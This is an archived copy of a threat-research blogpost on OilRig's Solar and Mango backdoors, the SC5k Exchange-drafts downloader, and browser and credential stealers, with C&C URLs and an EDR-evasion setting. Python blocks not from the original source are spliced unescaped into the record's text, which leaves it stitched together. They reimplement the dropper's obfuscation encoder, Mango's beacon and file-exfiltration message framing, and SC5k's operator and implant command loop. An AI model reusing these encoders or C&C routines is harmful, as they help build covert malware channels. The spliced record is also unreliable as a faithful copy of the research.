{
	"id": "4f9046e4-7c0e-4a0e-9273-8ec95f26f015",
	"created_at": "2026-04-06T00:18:14.223213Z",
	"updated_at": "2026-04-10T03:37:37.103333Z",
	"deleted_at": null,
	"sha1_hash": "5216b4cd9e4cbe88aa3fc04fe3be9081a31ed8b1",
	"title": "OilRig’s Outer Space and Juicy Mix: Same ol’ rig, new drill pipes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 784803,
	"plain_text": "OilRig’s Outer Space and Juicy Mix: Same ol’ rig, new drill pipes\r\nBy Zuzana Hromcová and Adam Burgher\r\nArchived: 2026-04-05 13:26:31 UTC\r\nUPDATE (June 5th, 2025): Since publishing this blogpost, we have updated our tracking to better reflect the full\r\nrange and complexity of the malicious activities carried out by the OilRig APT group. As a result, we are now\r\ntracking OilRig as a parent group with several subgroups. The activities described in this blogpost fall under the\r\nOilRig subgroup named Lyceum.\r\nLyceum, also known as HEXANE or Storm-0133, is an advanced threat group that focuses on targeting various\r\nIsraeli organizations, including governmental and local governmental entities and organizations in healthcare.\r\nMajor tools we attribute to Lyceum include DanBot, the Shark, Milan, and Marlin backdoors, Solar and Mango,\r\nOilForceGTX, and a variety of downloaders using legitimate cloud services for C\u0026C communication.\r\nESET researchers have analyzed two campaigns by the OilRig APT group: Outer Space (2021), and Juicy Mix (2022). Both\r\nof these cyberespionage campaigns targeted Israeli organizations exclusively, which is in line with the group’s focus on the\r\nMiddle East, and used the same playbook: OilRig first compromised a legitimate website to use as a C\u0026C server and then\r\nused VBS droppers to deliver a C#/.NET backdoor to its victims, while also deploying a variety of post-compromise tools\r\nmostly used for data exfiltration on the target systems.\r\nIn their Outer Space campaign, OilRig used a simple, previously undocumented C#/.NET backdoor we named Solar, along\r\nwith a new downloader, SampleCheck5000 (or SC5k), that uses the Microsoft Exchange Web Services (EWS) API for C\u0026C\r\ncommunication. For the Juicy Mix campaign, the threat actors improved on Solar to create the Mango backdoor, which\r\npossesses additional capabilities and obfuscation methods. 
In addition to detecting the malicious toolset, we also notified the\r\nIsraeli CERT about the compromised websites.\r\nKey points of this blogpost:\r\nESET observed two OilRig campaigns which occurred throughout 2021 (Outer Space) and 2022 (Juicy\r\nMix).\r\nThe operators exclusively targeted Israeli organizations and compromised legitimate Israeli websites for\r\nuse in their C\u0026C communications.\r\nThey used a new, previously undocumented C#/.NET first-stage backdoor in each campaign: Solar in\r\nOuter Space, then its successor Mango in Juicy Mix.\r\nBoth backdoors were deployed by VBS droppers, presumably spread via spearphishing emails.\r\nA variety of post-compromise tools were deployed in both campaigns, notably the SC5k downloader that\r\nuses the Microsoft Exchange Web Services (EWS) API for C\u0026C communication, and several tools to steal\r\nbrowser data and credentials from Windows Credential Manager.\r\nOilRig, also known as APT34, Lyceum, or Siamesekitten, is a cyberespionage group that has been active since at least 2014\r\nand is commonly believed to be based in Iran. The group targets Middle Eastern governments and a variety of business\r\nverticals, including chemical, energy, financial, and telecommunications. OilRig carried out the DNSpionage campaign in\r\n2018 and 2019, which targeted victims in Lebanon and the United Arab Emirates. In 2019 and 2020, OilRig continued\r\nattacks with the HardPass campaign, which used LinkedIn to target Middle Eastern victims in the energy and government\r\nsectors. 
In 2021, OilRig updated its DanBot backdoor and began deploying the Shark, Milan, and Marlin backdoors,\r\nmentioned in the T3 2021 issue of the ESET Threat Report.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 1 of 18\n\nIn this blogpost, we provide technical analysis of the Solar and Mango backdoors, of the VBS dropper used to deliver\r\nMango, and of the post-compromise tools deployed in each campaign.\r\nAttribution\r\nThe initial link that allowed us to connect the Outer Space campaign to OilRig is the use of the same custom Chrome data\r\ndumper (tracked by ESET researchers under the name MKG) as in the Out to Sea campaign. We observed the Solar\r\nbackdoor deploy the very same sample of MKG as in Out to Sea on the target’s system, along with two other variants.\r\nBesides the overlap in tools and targeting, we also saw multiple similarities between the Solar backdoor and the backdoors\r\nused in Out to Sea, mostly related to upload and download: both Solar and Shark, another OilRig backdoor, use URIs with\r\nsimple upload and download schemes to communicate with the C\u0026C server, with a “d” for download and a “u” for upload;\r\nadditionally, the downloader SC5k uses uploads and downloads subdirectories just like other OilRig backdoors, namely\r\nALMA, Shark, DanBot, and Milan. These findings serve as a further confirmation that the culprit behind Outer Space is\r\nindeed OilRig.\r\nAs for the Juicy Mix campaign’s ties to OilRig, besides targeting Israeli organizations – which is typical for this espionage\r\ngroup – there are code similarities between Mango, the backdoor used in this campaign, and Solar. Moreover, both\r\nbackdoors were deployed by VBS droppers with the same string obfuscation technique. 
The choice of post-compromise\r\ntools employed in Juicy Mix also mirrors previous OilRig campaigns.\r\nOuter Space campaign overview\r\nNamed for the astronomy-based naming scheme used in its function names and tasks, Outer Space is an OilRig\r\ncampaign from 2021. In this campaign, the group compromised an Israeli human resources site and subsequently used it as a\r\nC\u0026C server for its previously undocumented C#/.NET backdoor, Solar. Solar is a simple backdoor with basic functionality\r\nsuch as reading from and writing to disk, and gathering information.\r\nThrough Solar, the group then deployed a new downloader, SC5k, which uses the Exchange Web Services (EWS) API to\r\ndownload additional tools for execution, as shown in Figure 1. In order to exfiltrate browser data from the victim’s system,\r\nOilRig used a Chrome-data dumper called MKG.\r\nFigure 1. Overview of OilRig’s Outer Space comprom ise chain\r\nJuicy Mix campaign overview\r\nIn 2022 OilRig launched another campaign targeting Israeli organizations, this time with an updated toolset. We named the\r\ncampaign Juicy Mix for the use of a new OilRig backdoor, Mango (based on its internal assembly name, and its filename,\r\nMango.exe). In this campaign, the threat actors compromised a legitimate Israeli job portal website for use in C\u0026C\r\ncommunications. 
The group’s malicious tools were then deployed against a healthcare organization, also based in Israel.\r\nThe Mango first-stage backdoor is a successor to Solar, also written in C#/.NET, with notable changes that include\r\nexfiltration capabilities, use of native APIs, and added detection evasion code.\r\nAlong with Mango, we also detected two previously undocumented browser-data dumpers used to steal cookies, browsing\r\nhistory, and credentials from the Chrome and Edge browsers, and a Windows Credential Manager stealer, all of which we\r\nattribute to OilRig. These tools were all used against the same target as Mango, as well as at other compromised Israeli\r\norganizations throughout 2021 and 2022. Figure 2 shows an overview of how the various components were used in the Juicy\r\nMix campaign.\r\nFigure 2. Overview of components used in OilRig’s Juicy Mix campaign\r\nTechnical analysis\r\nIn this section, we provide a technical analysis of the Solar and Mango backdoors and the SC5k downloader, as well as other\r\ntools that were deployed to the targeted systems in these campaigns.\r\nVBS droppers\r\nTo establish a foothold on the target’s system, Visual Basic Script (VBS) droppers were used in both campaigns, which were\r\nvery likely spread by spearphishing emails. Our analysis below focuses on the VBS script used to drop Mango (SHA-1:\r\n3699B67BF4E381847BF98528F8CE2B966231F01A); note that Solar’s dropper is very similar.\r\nThe dropper’s purpose is to deliver the embedded Mango backdoor, schedule a task for persistence, and register the\r\ncompromise with the C\u0026C server. The embedded backdoor is stored as a series of base64 substrings, which are\r\nconcatenated and base64 decoded. 
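The digit-string obfuscation that the dropper applies to some of its strings (described in the next paragraphs and shown in Figure 4) can be undone, and regenerated for test purposes, in a few lines of Python. The block below is an added example; it is not code from the ESET post or from the dropper. It is reconstructed from the description and from the single worked sample the post gives (116110101109117+99111$68+77{79$68}46-50108109120115}77, which must decode to Msxml2.DOMDocument). Two details are inferred from that sample rather than stated in the post and are marked in the code: the three-digit groups decode to the plaintext in reverse order, so a reversal is applied, and the junk characters stand in only for leading zeros.

```python
# Added example (not code from the ESET post or from the OilRig dropper):
# decoder for the digit-string obfuscation of Mango's VBS dropper, plus an
# encoder for producing test vectors. Standard library only.
import random

# Characters the dropper replaces with '0' before splitting into 3-digit groups.
JUNK = set('#*+-_)(}{@$%^&')


def deobfuscate_digit_string(obfuscated):
    # 1. Every junk character becomes a '0', restoring the zero-padded codes.
    digits = ''.join('0' if c in JUNK else c for c in obfuscated)
    if len(digits) % 3 or not digits.isdigit():
        raise ValueError('not a valid 3-digit code string: %r' % obfuscated)
    # 2. Each 3-digit group is a character code (VBS Chr).
    chars = [chr(int(digits[i:i + 3])) for i in range(0, len(digits), 3)]
    # 3. Inferred from the post's sample: the groups decode to the plaintext
    #    in reverse order (the sample yields tnemucoDMOD.2lmxsM), so reverse.
    return ''.join(chars)[::-1]


def obfuscate_digit_string(plain, rng=None):
    # Inverse of the above, for generating test vectors. Inferred from the
    # post's sample: a junk character replaces only the leading zero of a
    # code; every other digit is emitted verbatim.
    rng = rng or random.Random(0)
    junk = sorted(JUNK)
    out = []
    for ch in reversed(plain):
        code = ord(ch)
        if code > 255:
            raise ValueError('Chr() codes must fit in one byte')
        text = '%03d' % code
        for i, d in enumerate(text):
            out.append(rng.choice(junk) if i == 0 and d == '0' else d)
    return ''.join(out)


def decode_all(candidates):
    # Triage helper: try every candidate string pulled from a script and keep
    # the ones that decode to printable text.
    found = {}
    for s in candidates:
        try:
            text = deobfuscate_digit_string(s)
        except ValueError:
            continue
        if text.isprintable():
            found[s] = text
    return found
```

Running decode_all over every long digit-and-punctuation literal extracted from a suspect VBS file recovers the COM object names and URLs the dropper hides this way; a string that fails the length check is simply not this scheme.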
As shown in Figure 3, the script also uses a simple string deobfuscation technique, where\r\nstrings are assembled at runtime using arithmetic operations and the Chr function.\r\nFigure 3. String deobfuscation technique used by OilRig’s VBS dropper for Mango\r\nOn top of that, Mango’s VBS dropper adds another type of string obfuscation and code to set up persistence and register\r\nwith the C\u0026C server. As shown in Figure 4, to deobfuscate some strings, the script replaces any characters in the set #*+-_)\r\n(}{@$%^\u0026 with 0, then divides the string into three-digit numbers that are then converted into ASCII characters using the\r\nChr function. For example, the string 116110101109117+99111$68+77{79$68}46-50108109120115}77 translates to\r\nMsxml2.DOMDocument. Note that the three-digit groups of this example decode, left to right, to tnemucoDMOD.2lmxsM,\r\nthe plaintext in reverse order, so reversing the decoded characters is the final step of the routine; in this sample the junk\r\ncharacters stand in only for the leading zero of a code below 100.\r\nFigure 4. String obfuscation function used by Mango’s VBS dropper\r\nOnce the backdoor has been written to disk, the dropper creates a scheduled task that executes Mango (or\r\nSolar, in the other version) every 14 minutes. Finally, the script sends the base64-encoded name of the compromised computer\r\nin a POST request to register the backdoor with its C\u0026C server.\r\nSolar backdoor\r\nSolar is the backdoor used in OilRig’s Outer Space campaign. Possessing basic functionalities, this backdoor can be used to,\r\namong other things, download and execute files, and automatically exfiltrate staged files.\r\nWe chose the name Solar based on the filename used by OilRig, Solar.exe. 
It is a fitting name since the backdoor uses an\r\nastronomy naming scheme for its function names and tasks used throughout the binary (Mercury, Venus, Mars, Earth, and\r\nJupiter).\r\nSolar begins execution by performing the steps shown in Figure 5.\r\nFigure 5. Initial execution flow of Solar\r\nThe backdoor creates two tasks, Earth and Venus, that run in memory. There is no stop function for either of the two\r\ntasks, so they will run indefinitely. Earth is scheduled to run every 30 seconds and Venus is set to run every 40 seconds.\r\nEarth is the primary task, responsible for the bulk of Solar’s functions. It communicates with the C\u0026C server using the\r\nfunction MercuryToSun, which sends basic system and malware version information to the C\u0026C server and then handles the\r\nserver’s response. Earth sends the following info to the C\u0026C server:\r\nThe string (@) \u003csystem hostname\u003e; the whole string is encrypted.\r\nThe string 1.0.0.0, encrypted (possibly a version number).\r\nThe string 30000, encrypted (possibly Earth’s scheduling interval in milliseconds, since 30000 ms matches its 30-second\r\nperiod).\r\nEncryption and decryption are implemented in functions named JupiterE and JupiterD, respectively. Both of them call a\r\nfunction named JupiterX, which implements an XOR loop as shown in Figure 6.\r\nFigure 6. The for loop in JupiterX that is used to encrypt and decrypt data\r\nThe key is derived from a hardcoded global string variable, 6sEj7*0B7#7, and a nonce: in this case, a random hex string\r\nfrom 2–24 characters long. 
Following the XOR encryption, standard base64 encoding is applied.\r\nAn Israeli human resources company’s web server, which OilRig compromised at some point before deploying Solar, was\r\nused as the C\u0026C server:\r\nhttp://organization.co[.]il/project/templates/office/template.aspx?rt=d\u0026sun=\u003cencrypted_MachineGuid\u003e\u0026rn=\u003cencryption_nonce\u003e\r\nPrior to being appended to the URI, the encryption nonce is encrypted, and the value of the initial query string, rt, is set to d\r\nhere, likely for “download”.\r\nThe last step of the MercuryToSun function is to process a response from the C\u0026C server. It does so by retrieving a\r\nsubstring of the response, which is found between the characters QQ@ and @kk. This response is a string of instructions\r\nseparated by asterisks (*) that is processed into an array. Earth then carries out the backdoor commands, which include\r\ndownloading additional payloads from the server, listing files on the victim’s system, and running specific executables.\r\nCommand output is then gzip compressed using the function Neptune and encrypted with the same encryption key and a\r\nnew nonce. Then the results are uploaded to the C\u0026C server, thus:\r\nhttp://organization.co[.]il/project/templates/office/template.aspx?rt=u\u0026sun=\u003cMachineGuid\u003e\u0026rn=\u003cnew_nonce\u003e\r\nMachineGuid and the new nonce are encrypted with the JupiterE function, and here the value of rt is set to u, likely for\r\n“upload”.\r\nVenus, the other scheduled task, is used for automated data exfiltration. This small task copies the content of files from a\r\ndirectory (also named Venus) to the C\u0026C server. These files are likely dropped here by some other, as yet unidentified,\r\nOilRig tool. 
After uploading a file, the task deletes it from disk.\r\nMango backdoor\r\nFor its Juicy Mix campaign, OilRig switched from the Solar backdoor to Mango. It has a similar workflow to Solar and\r\noverlapping capabilities, but there are nevertheless several notable changes:\r\nUse of TLS for C\u0026C communications.\r\nUse of native APIs, rather than .NET APIs, to execute files and shell commands.\r\nAlthough not actively used, detection evasion code was introduced.\r\nSupport for automated exfiltration (Venus in Solar) has been removed; instead, Mango supports an additional\r\nbackdoor command for exfiltrating selected files.\r\nSupport for log mode has been removed, and symbol names have been obfuscated.\r\nContrary to Solar’s astronomy-themed naming scheme, Mango obfuscates its symbol names, as can be seen in Figure 7.\r\nFigure 7. Unlike its predecessor Solar (left), Mango’s symbols have been obfuscated\r\nBesides the symbol name obfuscation, Mango also uses the string stacking method (as shown in Figure 8) to obfuscate\r\nstrings, which complicates the use of simple detection methods.\r\nFigure 8. Mango uses string stacking to obfuscate strings and thwart simple detection mechanisms\r\nSimilar to Solar, the Mango backdoor starts by creating an in-memory task, scheduled to run indefinitely every 32 seconds.\r\nThis task communicates with the C\u0026C server and executes backdoor commands, similar to Solar’s Earth task. While\r\nSolar also creates Venus, a task for automated exfiltration, this functionality has been replaced in Mango by a new backdoor\r\ncommand.\r\nIn the main task, Mango first generates a victim identifier, \u003cvictimID\u003e, to be used in C\u0026C communications. 
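The identifier, the request framing Mango wraps around it, and the response parsing are all described in the following paragraphs; they are easiest to follow as code. The block below is an added example and not code from the ESET post or from the malware: it builds a command request and a +dn upload message the way the post describes them, recovers the plaintext from a captured body (the defender's side), and splits a decoded response into its @-delimited arguments. One assumption is marked in the code: the post says only that data is XOR encrypted with the key Q\u00264g, so a repeating-key XOR over the UTF-8 bytes is used here. The TLS layer the post mentions is outside the scope of the example, which produces and parses HTTP bodies only.

```python
# Added example (not code from the ESET post or from Mango): Mango's C&C
# message framing, reconstructed from the published description.
import base64
import hashlib
import random

XOR_KEY = b'Q&4g'                 # key named in the post
# Cover-string alphabet, as the post says it appears in the code.
ALPHABET = 'i8p3aEeKQbN4klFMHmcC2dU9f6gORGIhDBLS0jP5Tn7o1AVJ'
OPEN, CLOSE = '[@', '@]'          # delimiters around the encoded data


def xor_bytes(data, key=XOR_KEY):
    # Assumption: repeating-key XOR; the post names the key but not the mode.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def victim_id(machine, user):
    # MD5 of <machine name><username>, as a lowercase hex string.
    return hashlib.md5((machine + user).encode('utf-8')).hexdigest()


def wrap(plaintext, rng=None):
    # XOR, base64, then hide the result at a random offset inside a
    # 3-14 character cover string drawn from ALPHABET.
    rng = rng or random.Random()
    encoded = base64.b64encode(xor_bytes(plaintext.encode('utf-8'))).decode('ascii')
    cover = ''.join(rng.choice(ALPHABET) for _ in range(rng.randint(3, 14)))
    pos = rng.randint(0, len(cover))
    return cover[:pos] + OPEN + encoded + CLOSE + cover[pos:]


def unwrap(body):
    # Defender side: recover the plaintext from a captured request or
    # response body. '@' occurs neither in base64 nor in ALPHABET, so the
    # delimiters are unambiguous.
    start = body.index(OPEN) + len(OPEN)
    end = body.index(CLOSE, start)
    return xor_bytes(base64.b64decode(body[start:end])).decode('utf-8')


def build_beacon(machine, user, rng=None):
    # Request for a command: d@<victimID>@<machine name>|<username>
    return wrap('d@%s@%s|%s' % (victim_id(machine, user), machine, user), rng)


def build_upload(machine, user, path, content, rng=None):
    # +dn result: u@<victimID>@<machine name>|<username>@<file path>@2@<base64 content>
    payload = base64.b64encode(content).decode('ascii')
    return wrap('u@%s@%s|%s@%s@2@%s' % (victim_id(machine, user), machine, user, path, payload), rng)


def parse_command(response_body):
    # Returns None for NCNT (no action), otherwise the @-delimited argument
    # list: Arg0 (echoed back in the reply), then Arg1..Arg3 as in Table 1.
    command = unwrap(response_body)
    if command == 'NCNT':
        return None
    return command.split('@')
```

For traffic analysis, unwrap is the useful function: given the body of any request to or response from the compromised site, it yields the d@/u@ strings and the commands directly, and a body in which the text between [@ and @] is not valid base64 is not Mango's.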
The ID is\r\ncomputed as an MD5 hash of \u003cmachine name\u003e\u003cusername\u003e, formatted as a hexadecimal string.\r\nTo request a backdoor command, Mango then sends the string d@\u003cvictimID\u003e@\u003cmachine name\u003e|\u003cusername\u003e to the C\u0026C\r\nserver http://www.darush.co[.]il/ads.asp – a legitimate Israeli job portal, likely compromised by OilRig before this\r\ncampaign. We notified the Israeli national CERT organization about the compromise.\r\nThe request body is constructed as follows:\r\nThe data to be transmitted is XOR encrypted using the encryption key Q\u00264g, then base64 encoded.\r\nA pseudorandom string of 3–14 characters is generated from this alphabet (as it appears in the code):\r\ni8p3aEeKQbN4klFMHmcC2dU9f6gORGIhDBLS0jP5Tn7o1AVJ.\r\nThe encrypted data is inserted in a pseudorandom position within the generated string, enclosed between [@ and @]\r\ndelimiters.\r\nTo communicate with its C\u0026C server, Mango uses the TLS (Transport Layer Security) protocol, which provides an\r\nadditional layer of encryption on top of the XOR scheme.\r\nSimilarly, the backdoor command received from the C\u0026C server is XOR encrypted, base64 encoded, and then enclosed\r\nbetween [@ and @] within the HTTP response body. The command itself is either NCNT (in which case no action is\r\ntaken), or a string of several parameters delimited by @, as detailed in Table 1, which lists Mango’s backdoor commands.\r\nNote that \u003cArg0\u003e is not listed in the table, but is used in the response to the C\u0026C server.\r\nTable 1. List of Mango’s backdoor commands\r\nArg1 = 1 or empty string:\r\n  Arg2 = +sp \u003coptional arguments\u003e; Arg3 = N/A\r\n    Action: executes the specified file/shell command (with the optional arguments) using the native CreateProcess API,\r\n    imported via DllImport. If the arguments contain [s], it is replaced by C:\\Windows\\System32\\.\r\n    Return value: command output.\r\n  Arg2 = +nu; Arg3 = N/A\r\n    Action: returns the malware version string and C\u0026C URL.\r\n    Return value: \u003cversionString\u003e|\u003cc2URL\u003e; in this case 1.0.0|http://www.darush.co[.]il/ads.asp\r\n  Arg2 = +fl \u003coptional directory name\u003e; Arg3 = N/A\r\n    Action: enumerates the content of the specified directory (or the current working directory).\r\n    Return value:\r\n      Directory of \u003cdirectory path\u003e\r\n      for each subdirectory: \u003clast_write_time\u003e \u003cDIR\u003e \u003csubdirectory name\u003e\r\n      for each file: \u003clast_write_time\u003e FILE \u003cfile size\u003e \u003cfilename\u003e\r\n      \u003cnumber of subdirectories\u003e Dir(s)\r\n      \u003cnumber of files\u003e File(s)\r\n  Arg2 = +dn \u003cfile name\u003e; Arg3 = N/A\r\n    Action: uploads the file content to the C\u0026C server via a new HTTP POST request formatted as\r\n    u@\u003cvictimID\u003e@\u003cmachine name\u003e|\u003cusername\u003e@\u003cfile path\u003e@2@\u003cbase64encodedFileContent\u003e.\r\n    Return value, one of: file[\u003cfilename\u003e] is uploaded to server. / file not found! / file path empty!\r\nArg1 = 2:\r\n  Arg2 = base64-encoded data; Arg3 = filename\r\n    Action: dumps the specified data into a file in the working directory.\r\n    Return value: file downloaded to path[\u003cfullFilePath\u003e]\r\nEach backdoor command is handled in a new thread, and their return values are then base64 encoded and combined with\r\nother metadata. Finally, that string is sent to the C\u0026C server using the same protocol and encryption method as described\r\nabove.\r\nUnused detection evasion technique\r\nInterestingly, we found an unused detection evasion technique within Mango. The function responsible for executing files\r\nand commands downloaded from the C\u0026C server takes an optional second parameter – a process ID. 
If set, Mango then uses\r\nthe UpdateProcThreadAttribute API to add the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY (0x20007) attribute, with the value\r\nPROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON\r\n(0x100000000000), to the attribute list used when the process is created, as shown in Figure 9.\r\nFigure 9. Unused security product evasion code in Mango backdoor\r\nThis policy prevents the process from loading any image that is not signed by Microsoft, which blocks endpoint security\r\nsolutions from loading the DLL that carries their user-mode code hooks. Note that UpdateProcThreadAttribute fills a\r\nSTARTUPINFOEX attribute list that CreateProcess consumes, so the policy takes effect in the newly created process; it cannot\r\nbe imposed on a process that is already running. While the parameter was not used in the sample we analyzed, it could be\r\nactivated in future versions.\r\nVersion 1.1.1\r\nUnrelated to the Juicy Mix campaign, in July 2023 we found a new version of the Mango backdoor (SHA-1:\r\nC9D18D01E1EC96BE952A9D7BD78F6BBB4DD2AA2A), uploaded to VirusTotal by several users under the name\r\nMenorah.exe. The internal version in this sample was changed from 1.0.0 to 1.1.1, but the only notable change is the use of a\r\ndifferent C\u0026C server, http://tecforsc-001-site1.gtempurl[.]com/ads.asp.\r\nAlong with this version, we also discovered a Microsoft Word document (SHA-1:\r\n3D71D782B95F13EE69E96BCF73EE279A00EAE5DB) with a malicious macro that drops the backdoor. Figure 10 shows\r\nthe fake warning message, enticing the user to enable macros for the document, and the decoy content that is displayed\r\nafterwards, while the malicious code is running in the background.\r\nFigure 10. 
Microsoft Word document with a malicious macro that drops Mango v1.1.1\r\nPost-compromise tools\r\nIn this section, we review a selection of post-compromise tools used in OilRig’s Outer Space and Juicy Mix campaigns,\r\naimed at downloading and executing additional payloads, and stealing data from the compromised systems.\r\nSampleCheck5000 (SC5k) downloader\r\nSampleCheck5000 (or SC5k) is a downloader used to download and execute additional OilRig tools, notable for using the\r\nMicrosoft Exchange Web Services (EWS) API for C\u0026C communication: the attackers create draft messages in an Exchange\r\nmailbox they control and hide the backdoor commands in there. Subsequently, the downloader logs into the same account, and\r\nparses the drafts to retrieve commands and payloads to execute.\r\nSC5k uses predefined values – Microsoft Exchange URL, email address, and password – to log into the remote Exchange\r\nserver, but it also supports the option to override these values using a configuration file in the current working directory\r\nnamed setting.key. We chose the name SampleCheck5000 based on one of the email addresses that the tool used in the Outer\r\nSpace campaign.\r\nOnce SC5k logs into the remote Exchange server, it retrieves all the emails in the Drafts directory, sorts them by most\r\nrecent, keeping only the drafts that have attachments. It then iterates over every draft message with an attachment, looking\r\nfor JSON attachments that contain \"data\" in the body. It extracts the value from the key data in the JSON file, base64\r\ndecodes and decrypts the value, and calls cmd.exe to execute the resulting command line string. 
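The polling loop just described, together with the reply-as-draft step covered in the next paragraph, modelled end to end. This is an added example and not code from the ESET post or from SC5k. It runs offline: the mailbox is a constructed in-memory stand-in for the EWS Drafts folder, command execution is replaced by a callback so nothing is run on the host, and, because the post does not name the cipher or key SC5k applies to the data value, a repeating-key XOR with a placeholder key is assumed. Two further assumptions are marked in the code: that a command draft is removed once consumed, and that result drafts carry the output in the message body rather than as a JSON attachment, so they are not mistaken for new commands on the next pass. The last function is the defender's view of the same data: the parsing SC5k does, turned into a hunting check over a mailbox's drafts.

```python
# Added example (not code from the ESET post or from SC5k): an offline model of
# the Drafts-folder command channel, plus a hunting check over the same data.
import base64
import json

ASSUMED_KEY = b'placeholder'      # assumption: the post does not give SC5k's key


def xor_bytes(data, key=ASSUMED_KEY):
    # Assumption: repeating-key XOR stands in for the unspecified cipher.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_data(text):
    # The value an operator places under the data key of the JSON attachment.
    return base64.b64encode(xor_bytes(text.encode('utf-8'))).decode('ascii')


def decode_data(value):
    return xor_bytes(base64.b64decode(value)).decode('utf-8')


def operator_queue_command(mailbox, cmdline, ts):
    # Operator side: save (never send) a draft whose JSON attachment carries
    # the command. Drafts are dicts; ts orders them, newest first.
    attachment = ('task.json', json.dumps({'data': encode_data(cmdline)}))
    mailbox.append({'ts': ts, 'body': '', 'attachments': [attachment]})


def command_attachments(mailbox):
    # Implant side: newest drafts first, only drafts with attachments, only
    # attachments that parse as a JSON object with a string under data.
    for draft in sorted(mailbox, key=lambda d: d['ts'], reverse=True):
        for _name, content in draft.get('attachments', []):
            try:
                obj = json.loads(content)
            except ValueError:
                continue
            if isinstance(obj, dict) and isinstance(obj.get('data'), str):
                yield draft, obj['data']


def implant_cycle(mailbox, execute, ts):
    # One pass of the SC5k loop: decode and run every queued command, then
    # report the output by saving a new draft. Returns [(cmdline, output)].
    results = []
    for draft, value in list(command_attachments(mailbox)):
        cmdline = decode_data(value)
        output = execute(cmdline)            # stand-in for cmd.exe /c <cmdline>
        results.append((cmdline, output))
        mailbox.remove(draft)                # assumption: consumed drafts are removed
        # assumption: results go in the body with no attachment, so the next
        # pass does not treat them as new commands
        mailbox.append({'ts': ts, 'body': encode_data(output), 'attachments': []})
    return results


def hunt_drafts(mailbox):
    # Defender side: indexes of drafts carrying a JSON attachment whose data
    # value is base64. Correlate with drafts that are never sent and with EWS
    # logons to the mailbox from hosts that should not be using it.
    hits = []
    for index, draft in enumerate(mailbox):
        for _name, content in draft.get('attachments', []):
            try:
                obj = json.loads(content)
                base64.b64decode(obj['data'], validate=True)
            except (ValueError, KeyError, TypeError):
                continue
            hits.append(index)
            break
    return hits
```

Against a real tenant the same hunt_drafts logic would run over the Drafts folder fetched through EWS or Graph; the point of the model is that every observable of this channel lives in a mailbox, not on the network path to a C\u0026C server, so mailbox-side telemetry is where it shows up.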
SC5k then saves the output\r\nof the cmd.exe execution to a local variable.\r\nAs the next step in the loop, the downloader reports the results to the OilRig operators by creating a new email message on\r\nthe Exchange server and saving it as a draft (not sending), as shown in Figure 11. A similar technique is used to exfiltrate\r\nfiles from a local staging folder. As the last step in the loop, SC5k also logs the command output in an encrypted and\r\ncompressed format on disk.\r\nFigure 11. Email message creation by SC5k\r\nBrowser-data dumpers\r\nIt is characteristic of OilRig operators to use browser-data dumpers in their post-compromise activities. We discovered two\r\nnew browser-data stealers among the post-compromise tools deployed in the Juicy Mix campaign alongside the Mango\r\nbackdoor. They dump the stolen browser data in the %TEMP% directory into files named Cupdate and Eupdate (hence\r\nour names for them: CDumper and EDumper).\r\nBoth tools are C#/.NET browser-data stealers, collecting cookies, browsing history, and credentials from the Chrome\r\n(CDumper) and Edge (EDumper) browsers. We focus our analysis on CDumper, since both stealers are practically identical,\r\nsave for some constants.\r\nWhen executed, CDumper first builds a list of users with Google Chrome installed. It then opens the Chrome SQLite Cookies,\r\nHistory and Login Data databases under \u003cuser profile\u003e\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data (the directory %LOCALAPPDATA%\r\npoints to for the current user) and collects browser data including visited URLs and saved logins, using SQL queries.\r\nThe cookie values are then decrypted, and all collected information is added to a log file named C:\\\\Users\\\\\r\n\u003cuser\u003e\\\\AppData\\\\Local\\\\Temp\\\\Cupdate, in cleartext. This functionality is implemented in CDumper functions named\r\nCookieGrab (see Figure 12), HistoryGrab, and PasswordGrab. 
Note that there is no exfiltration mechanism implemented\r\nin CDumper, but Mango can exfiltrate selected files via a backdoor command.\r\nFigure 12. CDumper’s CookieGrab function dumps and decrypts cookies from the Chrome data store\r\nIn both Outer Space and the earlier Out to Sea campaign, OilRig used a C/C++ Chrome data dumper called MKG. Like\r\nCDumper and EDumper, MKG was also able to steal usernames and passwords, browsing history, and cookies from the\r\nbrowser. This Chrome data dumper is typically deployed in the following file locations (with the first location being the\r\nmost common):\r\n%USERS%\\\\public\\\\programs\\\\vmwaredir\\\\\u003crandom_14_character_string\u003e\\\\mkc.exe\r\n%USERS%\\\\Public\\\\M64.exe\r\nWindows Credential Manager stealer\r\nBesides browser-data dumping tools, OilRig also used a Windows Credential Manager stealer in the Juicy Mix campaign.\r\nThis tool steals credentials from Windows Credential Manager, and similar to CDumper and EDumper, stores them in the\r\n%TEMP% directory – this time into a file named IUpdate (hence the name IDumper). Unlike CDumper and EDumper,\r\nIDumper is implemented as a PowerShell script.\r\nAs with the browser dumper tools, it is not uncommon for OilRig to collect credentials from the Windows Credential\r\nManager. Previously, OilRig’s operators were observed using VALUEVAULT, a publicly available, Go-compiled credential-theft tool (see the 2019 HardPass campaign and a 2020 campaign), for the same purpose.\r\nConclusion\r\nOilRig continues to innovate and create new implants with backdoor-like capabilities while finding new ways to execute\r\ncommands on remote systems. The group improved upon its C#/.NET Solar backdoor from the Outer Space campaign to\r\ncreate a new backdoor named Mango for the Juicy Mix campaign. 
